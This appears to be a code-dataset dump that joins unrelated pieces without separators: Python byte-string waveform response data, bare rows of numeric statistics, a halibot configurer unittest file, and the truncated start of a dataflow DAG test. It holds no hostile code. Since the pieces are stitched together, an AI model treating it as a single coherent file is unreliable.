b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x20\x10\x0c\x80\x00" \ b"\x09\x8d\x00\x04\x00\x00\x00\x40\x09\x24\x00\x04\x00\x02\x4b\xb4" \ b"\x09\x27\x00\x10\x00\x0e\x00\x50\x00\x6c\x00\x65\x00\x74\x00\x68" \ b"\x00\x20\x00\x00\x09\x96\x00\x02\x02\x00\x09\x11\x00\x02\x00\x06" \ b"\x09\x40\x00\x02\x00\x00\x09\x6f\x00\x0c\x00\x7f\xff\xff\x00\x7f" \ b"\xff\xff\x00\x00\x0f\xff\x09\x1a\x00\x24\x00\x04\x00\x20\x00\x7f" \ b"\xff\xff\x04\x00\x00\x00\x00\x7f\xff\xff\x06\x00\x00\x01\x00\x7f" \ b"\xff\xff\x0a\x00\x00\x01\x00\x7f\xff\xff\x0c\x00\x00\x00\x09\x6e" \ b"\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" \ b"\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_10_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\xa8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_10_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\xb0\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa0\x84\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x00\x20\x02" \ b"\x20\x04\x20\x08\x20\x08\x20\x0b\x20\x10\x20\x12\x20\x15\x20\x17" \ b"\x20\x1a\x20\x1c\x20\x1f\x20\x22\x20\x25\x20\x27\x20\x2a\x20\x2d" \ b"\x20\x30\x20\x33\x20\x33\x20\x32\x20\x30\x20\x2f\x20\x2a\x20\x28" \ b"\x20\x24\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x03\x20\x09" \ b"\x20\x0f\x20\x13\x20\x1d\x20\x23\x20\x27\x20\x2f\x20\x35\x20\x3d" \ b"\x20\x43\x20\x4b\x20\x51\x20\x57\x20\x5d\x20\x65\x20\x6b\x20\x71" \ b"\x20\x77\x20\x79\x20\x77\x20\x73\x20\x6d\x20\x65\x20\x61\x20\x59" \ b"\x20\x53\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_10_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\xb8\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9" \ b"\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf" \ b"\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd" \ b"\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe5\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15"
65.08506
69
0.699434
51,045
210,420
2.877657
0.005387
0.172088
0.223882
0.292464
0.989005
0.985499
0.984383
0.983198
0.975805
0.972258
0
0.298406
0.030349
210,420
3,232
70
65.105198
0.421523
0.000623
0
0.878711
0
0.939355
0.905489
0.904195
0
1
0
0
0
1
0
false
0
0
0
0
0.000319
0
0
0
null
0
1
1
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
1
0
1
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
15
46267a4356c0ae5ab15daed0682646c96521f6b2
3,884
py
Python
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
tests/test_configurer.py
Halibot/Halibot
36b8f2b4d7d3c7dbbb63b1eacea6c57accc8b26d
[ "BSD-3-Clause" ]
null
null
null
import util import halibot import unittest from unittest.mock import patch class TestConfigurer(unittest.TestCase): @patch('halibot.halconfigurer.get_input', return_value='bar') def test_optionString_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionString('foo', default="foo") c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], "bar") @patch('halibot.halconfigurer.get_input', return_value=2) def test_optionInt_int(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) @patch('halibot.halconfigurer.get_input', return_value="2") def test_optionInt_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) @patch('halibot.halconfigurer.get_input', return_value=None) def test_optionInt_none(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionInt('foo', default=1) c = Configurer() try: c.configure() except TypeError as e: # Yay, we type errored as expected return self.assertTrue(False) # pragma: no cover @patch('halibot.halconfigurer.get_input', return_value=2.1) def test_optionNumber_int(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2.1) @patch('halibot.halconfigurer.get_input', return_value="2") def test_optionNumber_str(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], 2) @patch('halibot.halconfigurer.get_input', return_value=None) def test_optionNumber_none(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionNumber('foo', default=1.0) c = Configurer() try: c.configure() except TypeError as e: # Yay, we type errored as expected return self.assertTrue(False) # pragma: no cover @patch('halibot.halconfigurer.get_input', return_value=True) def test_optionBoolean_true(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=False) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], True) @patch('halibot.halconfigurer.get_input', return_value=False) def test_optionBoolean_false(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=True) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], False) @patch('halibot.halconfigurer.get_input', return_value="TrUe") def test_optionBoolean_strTrue(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=False) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], True) @patch('halibot.halconfigurer.get_input', return_value="FaLsE") def test_optionBoolean_strFalse(self, input): class Configurer(halibot.HalConfigurer): def configure(self): self.optionBoolean('foo', default=True) c = Configurer() c.configure() self.assertTrue('foo' in c.options) self.assertEqual(c.options['foo'], False) if __name__ == '__main__': unittest.main()
27.546099
64
0.725283
499
3,884
5.541082
0.116232
0.159132
0.099458
0.111392
0.909946
0.909946
0.909946
0.894033
0.893671
0.893671
0
0.005646
0.133625
3,884
140
65
27.742857
0.816048
0.025489
0
0.745455
0
0
0.120667
0.090236
0
0
0
0
0.181818
1
0.2
false
0
0.036364
0
0.363636
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
465c55d2b3c364fe21a054436c9fa2669f92774a
15,524
py
Python
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
tests/unit/dags/test_base.py
akumuthan-dev/data-flow
efb29a05136adff6c8d103f228568353e3eebee0
[ "MIT" ]
null
null
null
from datetime import datetime import sqlalchemy as sa from airflow.operators.python_operator import PythonOperator from dataflow.dags import _PandasPipelineWithPollingSupport, _PipelineDAG from dataflow.utils import TableConfig, LateIndex from tests.unit.utils import get_base_dag_tasks def test_base_dag_tasks(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, 